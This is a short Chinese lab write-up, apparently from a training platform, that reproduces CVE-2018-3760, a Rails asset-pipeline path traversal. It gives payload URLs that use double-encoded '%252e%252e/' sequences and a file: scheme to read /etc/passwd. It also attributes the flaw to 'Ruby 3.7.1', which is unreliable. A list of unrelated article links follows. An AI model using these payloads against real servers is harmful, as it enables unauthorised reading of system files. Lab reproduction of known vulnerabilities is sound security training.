墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

admin and root2023-11-07 14:15

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码 
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码 
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
阿sir19812 小时前
ZYNQ 自定义IP
服务器·网络·tcp/ip
我不只是切图仔13 小时前
我只是想给网站加个注册验证码,咋就那么难!
前端·后端
专注VB编程开发20年13 小时前
CSS 的命名方式像是 PowerShell 的动词-名词结构,缺乏面向对象的层级关系
开发语言·后端·rust
野犬寒鸦13 小时前
力扣hot100:相交链表与反转链表详细思路讲解(160,206)
java·数据结构·后端·算法·leetcode
星马梦缘13 小时前
计算机网络4 第四章 网络层——网络间的通信问题(省际之间如何规划信件运输路线)
网络·计算机网络·路由·ip地址·子网掩码·icmp·ipv4/ipv6
爱吃烤鸡翅的酸菜鱼13 小时前
【Spring】原理:Bean的作用域与生命周期
后端·spring
JohnYan13 小时前
工作笔记 - 微信消息发送和处理
javascript·后端·微信
该用户已不存在13 小时前
macOS是开发的终极进化版吗?
前端·后端
计算机毕业设计木哥14 小时前
计算机毕设选题:基于Python+Django的B站数据分析系统的设计与实现【源码+文档+调试】
java·开发语言·后端·python·spark·django·课程设计
歪歪10014 小时前
qt creator新手入门以及结合sql server数据库开发
c语言·开发语言·后端·qt·数据库开发
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路03UV安装并设置国内源04不再让Windows更新!&Edge游戏助手卸载及关闭自动更新052025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定062025高教社杯国赛数学建模选题建议+初步分析07KGG转MP3工具|非KGM文件|解密音频08A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程092025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定10jdk21下载、安装(Windows、Linux、macOS)